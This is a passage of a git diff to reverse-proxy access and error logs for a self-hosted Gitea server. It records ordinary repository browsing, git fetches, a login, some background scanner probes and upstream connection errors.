222.117.41.51] [Length 178] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" +[19/Feb/2026:01:36:38 +0000] - 200 200 - POST https git.hanmocnn.co.kr "/windpacer/homepage.git/git-upload-pack" [Client 222.117.41.51] [Length 65] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" +[19/Feb/2026:02:52:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 83.150.56.179] [Length 5666] [Gzip 2.42] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[19/Feb/2026:02:52:43 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/js/twint_ch.js" [Client 83.150.56.179] [Length 3984] [Gzip 2.34] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[19/Feb/2026:02:52:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/img/favicon.png" [Client 83.150.56.179] [Length 4136] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[19/Feb/2026:02:52:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/img/favicon.svg" [Client 83.150.56.179] [Length 1040] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[19/Feb/2026:02:52:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/css/index.css?v=1.25.3" [Client 83.150.56.179] [Length 55932] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[19/Feb/2026:02:52:53 +0000] - - 499 - GET https git.hanmocnn.co.kr "/assets/css/theme-gitea-auto.css?v=1.25.3" [Client 83.150.56.179] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[19/Feb/2026:02:52:55 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/css/support_parent.css" [Client 83.150.56.179] [Length 3983] [Gzip 2.34] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[19/Feb/2026:02:52:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/js/index.js?v=1.25.3" [Client 83.150.56.179] [Length 77509] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[19/Feb/2026:02:53:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 23.27.145.36] [Length 5678] [Gzip 2.43] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Linux i686; rv:109.0) Gecko/20100101 Firefox/120.0" "-" +[19/Feb/2026:02:57:35 +0000] - - 301 - GET http git.hanmocnn.co.kr "/windpacer/homepage.git/info/refs?service=git-upload-pack" [Client 222.117.41.51] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" +[19/Feb/2026:02:57:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage.git/info/refs?service=git-upload-pack" [Client 222.117.41.51] [Length 178] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" +[19/Feb/2026:02:57:35 +0000] - 200 200 - POST https git.hanmocnn.co.kr "/windpacer/homepage.git/git-upload-pack" [Client 222.117.41.51] [Length 65] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" +[19/Feb/2026:03:12:26 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[19/Feb/2026:03:12:26 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/user/login" [Client 222.117.41.51] [Length 28] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[19/Feb/2026:03:12:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 11742] [Gzip 4.95] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[19/Feb/2026:03:12:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/repo/search?count_only=1&uid=1&team_id=undefined&q=&page=1&mode=" [Client 222.117.41.51] [Length 12] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[19/Feb/2026:03:12:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/repo/search?sort=updated&order=desc&uid=1&team_id=undefined&q=&page=1&limit=15&mode=&archived=false" [Client 222.117.41.51] [Length 5594] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[19/Feb/2026:03:12:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" +[19/Feb/2026:03:12:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage" [Client 222.117.41.51] [Length 20345] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[19/Feb/2026:03:12:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" +[19/Feb/2026:03:12:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html" [Client 222.117.41.51] [Length 17361] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[19/Feb/2026:03:12:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/tree-view/branch/main/?sub_path=html" [Client 222.117.41.51] [Length 21742] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[19/Feb/2026:03:12:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" +[19/Feb/2026:03:12:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/index.html" [Client 222.117.41.51] [Length 41711] [Gzip 9.31] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[19/Feb/2026:03:12:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/tree-view/branch/main/?sub_path=html%2Findex.html" [Client 222.117.41.51] [Length 21742] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[19/Feb/2026:03:13:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/index.tsx?only_content=true" [Client 222.117.41.51] [Length 4910] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[19/Feb/2026:03:13:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/index.html?only_content=true" [Client 222.117.41.51] [Length 31819] [Gzip 11.18] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[19/Feb/2026:03:18:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 144] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" +[19/Feb/2026:03:45:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 5778] [Gzip 2.38] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[19/Feb/2026:03:45:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/js/index.js?v=1.25.3" [Client 222.117.41.51] [Length 88858] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[19/Feb/2026:03:45:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/css/theme-gitea-auto.css?v=1.25.3" [Client 222.117.41.51] [Length 4323] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[19/Feb/2026:03:45:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/img/logo.svg" [Client 222.117.41.51] [Length 1040] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[19/Feb/2026:03:45:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/css/index.css?v=1.25.3" [Client 222.117.41.51] [Length 55932] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[19/Feb/2026:03:45:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/css/index-domready.3e022997.css" [Client 222.117.41.51] [Length 5100] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[19/Feb/2026:03:45:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/js/index-domready.d839c4b7.js" [Client 222.117.41.51] [Length 220214] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[19/Feb/2026:03:45:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/img/favicon.png" [Client 222.117.41.51] [Length 4136] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[19/Feb/2026:03:45:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2f" [Client 222.117.41.51] [Length 4965] [Gzip 2.37] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[19/Feb/2026:03:45:43 +0000] - 303 303 - POST https git.hanmocnn.co.kr "/user/login" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[19/Feb/2026:03:45:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 11746] [Gzip 4.95] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[19/Feb/2026:03:45:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/css/theme-gitea-dark-protanopia-deuteranopia.css?v=1.25.3" [Client 222.117.41.51] [Length 3036] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[19/Feb/2026:03:45:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/avatars/a16511949167cdebe904492446eff88b?size=48" [Client 222.117.41.51] [Length 2182] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[19/Feb/2026:03:45:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/avatars/a16511949167cdebe904492446eff88b?size=56" [Client 222.117.41.51] [Length 2182] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[19/Feb/2026:03:45:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/img/avatar_default.png" [Client 222.117.41.51] [Length 4595] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[19/Feb/2026:03:45:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/js/eventsource.sharedworker.js?v=1.25.3" [Client 222.117.41.51] [Length 806] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[19/Feb/2026:03:45:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/repo/search?count_only=1&uid=1&team_id=undefined&q=&page=1&mode=" [Client 222.117.41.51] [Length 12] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[19/Feb/2026:03:45:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/repo/search?sort=updated&order=desc&uid=1&team_id=undefined&q=&page=1&limit=15&mode=&archived=false" [Client 222.117.41.51] [Length 5594] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[19/Feb/2026:03:46:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" +[19/Feb/2026:03:46:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/e33d42bd7e899eb92cc0ee3f045456c042064be9" [Client 222.117.41.51] [Length 187393] [Gzip 17.15] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[19/Feb/2026:03:46:05 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2ef5d95981cbbaf306e340cb61e30e1cea99df92/html/assets/images/icons/icons.svg" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[19/Feb/2026:03:46:05 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2ef5d95981cbbaf306e340cb61e30e1cea99df92/html/assets/images/icons/icons.svg" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[19/Feb/2026:03:46:05 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2ef5d95981cbbaf306e340cb61e30e1cea99df92/html/assets/images/icons/icons.svg" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[19/Feb/2026:03:46:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 14] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" +[19/Feb/2026:03:46:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/e33d42bd7e899eb92cc0ee3f045456c042064be9?style=unified&whitespace=show-all&show-outdated=" [Client 222.117.41.51] [Length 171707] [Gzip 14.44] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[19/Feb/2026:03:46:54 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2ef5d95981cbbaf306e340cb61e30e1cea99df92/html/assets/images/icons/icons.svg" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[19/Feb/2026:03:46:54 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2ef5d95981cbbaf306e340cb61e30e1cea99df92/html/assets/images/icons/icons.svg" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[19/Feb/2026:03:46:54 +0000] - 304 304 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2ef5d95981cbbaf306e340cb61e30e1cea99df92/html/assets/images/icons/icons.svg" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[19/Feb/2026:03:47:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 14] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" +[19/Feb/2026:03:47:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 11746] [Gzip 4.95] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[19/Feb/2026:03:47:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/repo/search?count_only=1&uid=1&team_id=undefined&q=&page=1&mode=" [Client 222.117.41.51] [Length 12] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[19/Feb/2026:03:47:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/repo/search?sort=updated&order=desc&uid=1&team_id=undefined&q=&page=1&limit=15&mode=&archived=false" [Client 222.117.41.51] [Length 5594] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[19/Feb/2026:03:47:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" +[19/Feb/2026:03:47:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 11746] [Gzip 4.95] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[19/Feb/2026:03:47:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/repo/search?count_only=1&uid=1&team_id=undefined&q=&page=1&mode=" [Client 222.117.41.51] [Length 12] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[19/Feb/2026:03:47:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/repo/search?sort=updated&order=desc&uid=1&team_id=undefined&q=&page=1&limit=15&mode=&archived=false" [Client 222.117.41.51] [Length 5594] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[19/Feb/2026:03:47:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" +[19/Feb/2026:03:47:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage" [Client 222.117.41.51] [Length 20341] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[19/Feb/2026:03:47:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" +[19/Feb/2026:03:47:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html" [Client 222.117.41.51] [Length 17356] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[19/Feb/2026:03:47:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/tree-view/branch/main/?sub_path=html" [Client 222.117.41.51] [Length 21742] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[19/Feb/2026:03:47:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" +[19/Feb/2026:03:47:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/index.html" [Client 222.117.41.51] [Length 41716] [Gzip 9.31] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[19/Feb/2026:03:47:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/tree-view/branch/main/?sub_path=html%2Findex.html" [Client 222.117.41.51] [Length 21742] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" +[19/Feb/2026:04:14:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 690] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" diff --git a/npm/data/logs/proxy-host-4_error.log b/npm/data/logs/proxy-host-4_error.log index 1f3aef7..e52b21a 100644 --- a/npm/data/logs/proxy-host-4_error.log +++ b/npm/data/logs/proxy-host-4_error.log @@ -1,782 +1 @@ -2026/02/15 01:52:09 [error] 428#428: *3696 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: git.hanmocnn.co.kr, request: "GET /favicon.ico HTTP/1.1", upstream: "http://192.168.0.250:3000/favicon.ico", host: "git.hanmocnn.co.kr", referrer: "http://git.hanmocnn.co.kr/" -2026/02/15 01:52:12 [warn] 428#428: *3700 using uninitialized "server" variable while logging request, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "LEAKIX" -2026/02/15 01:52:12 [error] 430#430: *3702 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "GET / HTTP/1.1", upstream: "http://192.168.0.250:3000/", host: "git.hanmocnn.co.kr" -2026/02/15 01:52:13 [error] 431#431: *3704 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "GET / HTTP/1.1", upstream: "http://192.168.0.250:3000/", host: "git.hanmocnn.co.kr" -2026/02/15 01:52:13 [error] 429#429: *3706 connect() failed (111: Connection refused) while connecting to upstream, client: 146.190.242.161, server: git.hanmocnn.co.kr, request: "GET /server HTTP/1.1", upstream: "http://192.168.0.250:3000/server", host: "git.hanmocnn.co.kr" -2026/02/15 01:52:14 [error] 433#433: *3708 connect() failed (111: Connection refused) while connecting to upstream, client: 139.59.231.238, server: git.hanmocnn.co.kr, request: "GET /server HTTP/1.1", upstream: "http://192.168.0.250:3000/server", host: "git.hanmocnn.co.kr" -2026/02/15 01:52:14 [error] 432#432: 